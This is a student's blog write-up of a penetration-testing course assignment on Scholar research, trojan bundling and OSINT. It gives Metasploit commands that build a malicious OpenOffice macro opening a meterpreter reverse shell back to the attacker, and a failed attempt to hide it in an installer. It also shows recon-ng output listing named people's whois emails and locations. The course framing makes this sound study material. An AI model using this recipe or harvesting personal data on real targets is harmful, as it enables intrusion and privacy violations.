Penetration testing OSINT and packaging trojan horse

H6 – OSINT and Trojan horse packaging

Assignment given by Tero Karvinen

1) Hae Google Scholarlista tuore (alle 1-2 v) artikkeli, joka liittyy kurssin aiheeseen. Sopivia ovat vertaisarvioidut (peer-reviewed) artikkelit (journal articles) tai  konfferenssipaperit (conference papers, ovat hieman alempaa tasoa kuin journal artikkelit). Muista säätää asetukset: English. Library links: Haaga-Helia. No citations, no patents. Since 2017. Kokotekstit (full text PDF) ovat oikeassa reunassa. Minkä käytännön pentestiin sovellettavan asian opit artikkelista?

2) Tee Google Scholar -haku kiinnostavasta aiheesta, jota haluat seurata. Mitä 5 tuoreinta tai viitatuinta artikkelia kertovat? Voit silmäillä artikkelit, ei tarvitse tiivistää niitä kattavasti. Tilaa haku omaan sähköpostiisi (alerts). Näin pysyt kärryillä oman alasi uudesta tieteellisestä tutkimuksesta – ehkä alue on hallussa jo opinnäytettä aloittaessa.

3) Paketoi troijan hevonen itse. Voit tehdä asennuksen esimerkiksi inno setup -ohjelmalla. Voit kokeilla myös pakata samaan asennukseen vihamielisen ohjelman sekä normaalin ohjelman – näin et joudu muokkaamaan normaalin ohjelman binääriä. Nimeä ohjelmat siten, että haitallinen tarkoitus ilmenee MALWARE-installer.exe. Älä tee itsestään leviäviä ohjelmia.

4) OSINT. Mistä ja millä tekniikoilla voit hakea ihmisistä tietoa avoimista lähteistä? Voit myös kokeilla sovelluksia, esim. maltego (suljettu) tai recon-ng (vapaa); sekä weppisivuja (esim. inteltechniques.com) ja oppaita (esim email). Voit hyödyntää myös offline-lähteitä. (Tämä kohta käsittelee tekniikoita, työkaluja ja weppisivuja – älä laita tähän parisi tietoja)

5) Hae paristasi tietoa avoimista lähteistä. Pyri laatimaan kattava profiili henkilöstä: historia, kiinnostuksen kohteen, poliittiset mielipiteet, lähipiiri, taloudellinen tilanne, asuinpaikka… Älä julkaise tuloksia edes anonymisoituna, ei edes salasanan takana, äläkä kerro niistä ulkopuolisille hauskoja anekdootteja. Anna tulokset parillesi (sille, josta tiedot kertovat). Kysy pariltasi etukäteen, mistä tiedoista voimme keskustella tunnilla ja millä tarkkuudella. Käytä vain laillisia tekniikoita ja julkisia lähteitä. Tässä tehtävässä ei saa murtautua mihinkään, eikä esiintyä toisena henkilönä. Ole asiakkaan (parisi) luottamuksen arvoinen – myös pentest-asiakkaasi edellyttävät luottamuksellisuutta.

6) Vapaaehtoinen: Koodaa oma troijan hevonen. Se voi esimerkiksi siirtää (exfiltrate) luottamuksellisia tiedostoja (selaimen salasanat, salaiset avaimet), nauhoittaa näppäimistöä (laukaisee todennäköisesti virustutkan/IDS:n) tai asentaa salaa lisää ohjelmia.


Testing Envinroment

For this assignment I used Laptop Acer 5439 and using Ubuntu 18.04 LTS.


1) Google Scholar I

For the first assignment I had to choose one peer-reviewed, journal articles or conference papers and write what I have learn from it.

For this assignment I read http://www.bgupta.com/resources/21-Gupta-2017-Gold.pdf. Here the writer was going through hacking and pen testing and gave also some examples of web application that were hacked. Maybe what I learned from this was that how someone should preemptively prepare for getting hacked.

Vulnerability risk assessment DREAD model came as a new thing for me. DREAD model is to keep track how secure is your application. DREAD stand for:

  • D = Damage
  • R = Reproducibility
  • E = Exploitability
  • A = Affected Users
  • D = Discoverability

Then it has to be calculated:

DREAD Index = (DAMAGE + REPRODUCIBILITY + EXPLOITABILITY + AFFECTED USERS + DISCOVERABILITY) / 5

With this a vulnerability can be found and deside what to do with it.


2) Google Scholar II

I had to search for newest articles that I am interested in and then subscribe for the searches.

Making alerts is easy in Google Scholar.

In the main screen click the “hamburger” menu button.

Capture.PNG

After clicking the “hamburger” menu it will open side menu.

Capture.PNG

Then you just have to click Alerts

Capture.PNG

And then click the CREATE ALERT

Capture.PNG

And then when choosing CREATE ALERT again it will create an alert.

Capture.PNG

And that is how to create and alert.

Capture.PNG

IoT: https://cs.gmu.edu/~astavrou/research/DDoS_Mirai.pdf = This small article tells about that all IoT device can be exposed to denial-of-service attacks.

Robotics deep  learning: http://journals.sagepub.com/doi/pdf/10.1177/0278364917710318 = This article goes how robotics learning hand-eye coorgination.

Virtual Reality: http://pediatrics.aappublications.org/content/140/Supplement_2/S86 = I am interested in what direction virtual reality is going and in hear is told how virtual reality is used in psychology.

Kali Linux: https://books.google.fi/books?hl=en&lr=&id=-Z9XAQAAQBAJ&oi=fnd&pg=PP15&dq=kali+linux%C2%A8&ots=rji3dtSuQD&sig=w1Z_NqyPD58swJN0tXMRwVJgEFU&redir_esc=y#v=onepage&q=kali%20linux%C2%A8&f=false = A cookbook for Kali Linux.

Deep Dark Web: https://www.cigionline.org/sites/default/files/gcig_paper_no6.pdf = How deep dark web is impacting on internet and cyber security


3) Bundled Trojan Horse

For this assignment I had to bundle a trojan horse to some program or just to bundle a trojan horse using for example inno setup.

I started this assignment by downloading Inno Setup.

Capture.PNG

Now I had Inno Setup installed so now I had to make some trojan horse for and for that I had to go for Kali Linux.

Making the reverce_tcp

So in Kali Linux I opened Metasploit

$ sudo msfdb init

$ sudo msfconsole

When Metasploit was opened I started doing the trojan horse.

msf > use exploit/multi/misc/openoffice_document_macro

msf exploit(multi/misc/openoffice_document_macro) > set payload windows/meterpreter/reverse_tcp

Then I had to specifie IP-addres and port to listen.

msf exploit(multi/misc/openoffice_document_macro) > set LHOST {your ip-addres}

msf exploit(multi/misc/openoffice_document_macro) > set LPORT {can be any port}

Capture.PNG

And now I had to run it and it would create me a macro file for OpenOffice.

Capture.PNG

And it was running. Now the target would have to only open the file and I would get access to the targets computer but as we are making it into a program so lets do that first.

Bundle trojan horse

Capture.PNG

So now I had my 2 file and now I could start making the program.

Capture.PNG

Started by selecting “Create a ne script file using the Script Wizard”

Capture.PNG

Next here

Capture.PNG

Here you can give a name and a version number and other info but for now I am going to leave it like that.

Capture.PNG

Left it like this…

Capture.PNG

Here I had to select the main application that would be executed and then the virus file or any other file you want it to run.

Capture.PNG

This window is up to you how you want it to be but here are my choises.

Capture.PNG

Didn’t had any of these so left them blank.

Capture.PNG

Chose English

Capture.PNG

First is where the program would be installer and the second is the name of the executable file. Others I left blank.

Capture.PNG

This one can be left blank or not.

Capture.PNG

And now it was finished… But as I looked at the script code it didn’t run my malware file anywhere and therefor it wouldn’t work

For this to work it requires more work for me.


4) OSINT

For this assignment I had to tell how and with what techniques I could get a persons information. There are many ways to OSINT someone but I am going to show a few tools and maybe in the future I will open how to use the tools more.

Recon-ng

If you have Kali Linux then it probably is already installed and can be opened with a command:

$ recon-ng

If you don’t have Kali Linux and have for example Ubuntu then on Recon-ng bitbucket can be found instruction on how to install.

Using recon-ng

[recon-ng][default] > add domains
domain (TEXT): facebook.com
[recon-ng][default] > show domains

+————————————-+
| rowid | domain | module |
+————————————-+
| 1 | facebook.com | user_defined |
+————————————-+

[*] 1 rows returned

When Recon.ng is opened, firstly I had to add domain for where I will get some info. I will try to get something from facebook.com.

[recon-ng][default] > use whois_pocs
[recon-ng][default][whois_pocs] > show info

Name: Whois POC Harvester
Path: modules/recon/domains-contacts/whois_pocs.py
Author: Tim Tomes (@LaNMaSteR53)

Description:
Uses the ARIN Whois RWS to harvest POC data from whois queries for the given domain. Updates the
‘contacts’ table with the results.

Options:
Name Current Value Required Description
—— ————- ——– ———–
SOURCE default yes source of input (see ‘show info’ for details)

Source Options:
default SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
<string> string representing a single input
<path> path to a file containing a list of inputs
query <sql> database query returning one column of inputs

Then I set recon-ng to use whois_pocs for gathering information.

[recon-ng][default][whois_pocs] > run

————
FACEBOOK.COM
————
[*] URL: http://whois.arin.net/rest/pocs;domain=facebook.com
[*] URL: http://whois.arin.net/rest/poc/NOL17-ARIN
[*] [contact] Lea Neteork ops (leigha311@facebook.com) – Whois contact
[*] URL: http://whois.arin.net/rest/poc/OPERA82-ARIN
[*] [contact] <blank> Operations (domain@facebook.com) – Whois contact
[*] URL: http://whois.arin.net/rest/poc/BST184-ARIN
[*] [contact] Brandon Stout (bstout@facebook.com) – Whois contact
[*] URL: http://whois.arin.net/rest/poc/DJW23-ARIN
[*] [contact] Darrell Wayne (tiffany.cameron.507@facebook.com) – Whois contact
[*] URL: http://whois.arin.net/rest/poc/MZU-ARIN
[*] [contact] Mark Zuckerberg (zuck@thefacebook.com) – Whois contact

 


SUMMARY
——-
[*] 5 total (0 new) contacts found.
[recon-ng][default][whois_pocs] >
 

And when I ran it I got some information with the whois_pocs.

I don’t have much but if would have much more I could view all the contacts with command show contacts:

[recon-ng][default][whois_pocs] > show contacts

+————————————————————————————————————————————————–+
| rowid | first_name | middle_name | last_name | email | title | region | country | module |
+————————————————————————————————————————————————–+
| 1 | Jay | | Simon | jay@oneplus.com | Whois contact | Northbrook, IL | United States | whois_pocs |
| 2 | Rick | | Stewart | rstewart@cardoneplus.com | Whois contact | Toronto, ON | Canada | whois_pocs |
| 3 | Lea | | Neteork ops | leigha311@facebook.com | Whois contact | Dalton, GA | United States | whois_pocs |
| 4 | | | Operations | domain@facebook.com | Whois contact | Menlo Park, CA | United States | whois_pocs |
| 5 | Brandon | | Stout | bstout@facebook.com | Whois contact | Chicago, IL | United States | whois_pocs |
| 6 | Darrell | | Wayne | tiffany.cameron.507@facebook.com | Whois contact | Flowermound, TX | United States | whois_pocs |
| 7 | Mark | | Zuckerberg | zuck@thefacebook.com | Whois contact | Palo Alto, CA | United States | whois_pocs |
+————————————————————————————————————————————————–+

[*] 7 rows returned

It returned in a good table form.

Now to get more information. First lets go back one step

[recon-ng][default][whois_pocs] > back 

Now lets get some subdomains .

[recon-ng][default] > use bing_domain_web

And again run to run the scan

[recon-ng][default][bing_domain_web] > run ————
FACEBOOK.COM
————
[*] URL: https://www.bing.com/search?first=0&q=domain%3Afacebook.com [*] [host] web.facebook.com (<blank>) [*] [host] http://www.facebook.com (<blank>) [*] [host] mobile.facebook.com (<blank>) [*] [host] m.facebook.com (<blank>) [*] [host] fi-fi.latest.facebook.com (<blank>) [*] [host] fr-ca.facebook.com (<blank>) [*] [host] fi-fi.prod.facebook.com (<blank>)
[*] [host] fi-fi.facebook.com (<blank>)
[*] Sleeping to avoid lockout…

——-
SUMMARY
——-
[*] 51 total (51 new) hosts found.

Didn’t took long and I got some information. Lets also see what it gave whit command “show hosts”

[recon-ng][default][bing_domain_web] > show hosts

+————————————————————————————————————-+
| rowid | host | ip_address | region | country | latitude | longitude | module |
+————————————————————————————————————-+
| 1 | web.facebook.com | | | | | | bing_domain_web |
| 2 | http://www.facebook.com | | | | | | bing_domain_web |
| 3 | mobile.facebook.com | | | | | | bing_domain_web |
| 4 | m.facebook.com | | | | | | bing_domain_web |
| 5 | fi-fi.latest.facebook.com | | | | | | bing_domain_web |
| 6 | fr-ca.facebook.com | | | | | | bing_domain_web |
| 7 | fi-fi.prod.facebook.com | | | | | | bing_domain_web |
| 8 | fi-fi.facebook.com | | | | | | bing_domain_web |
| 9 | en-gb.facebook.com | | | | | | bing_domain_web |
| 10 | hr-hr.facebook.com | | | | | | bing_domain_web |

……

[*] 51 rows returned

With these basic commands you can get some information. There are many more what I haven’t tested but will update if will be tested by me.

 


5)


6)  (optional)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s